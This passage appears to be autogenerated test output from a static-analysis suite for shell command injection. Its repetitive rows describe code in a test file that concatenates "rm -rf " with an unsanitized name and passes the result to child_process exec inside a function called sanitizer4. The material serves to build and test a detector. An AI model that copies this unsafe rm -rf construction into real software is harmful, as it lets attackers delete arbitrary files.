cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | exceptional return of isNaN(name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | exceptional return of isNaN(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:6:513:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:6:513:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:6:513:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:6:513:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:6:513:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:11:513:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:23:513:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:23:513:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:23:513:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:23:513:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:23:513:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:23:513:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 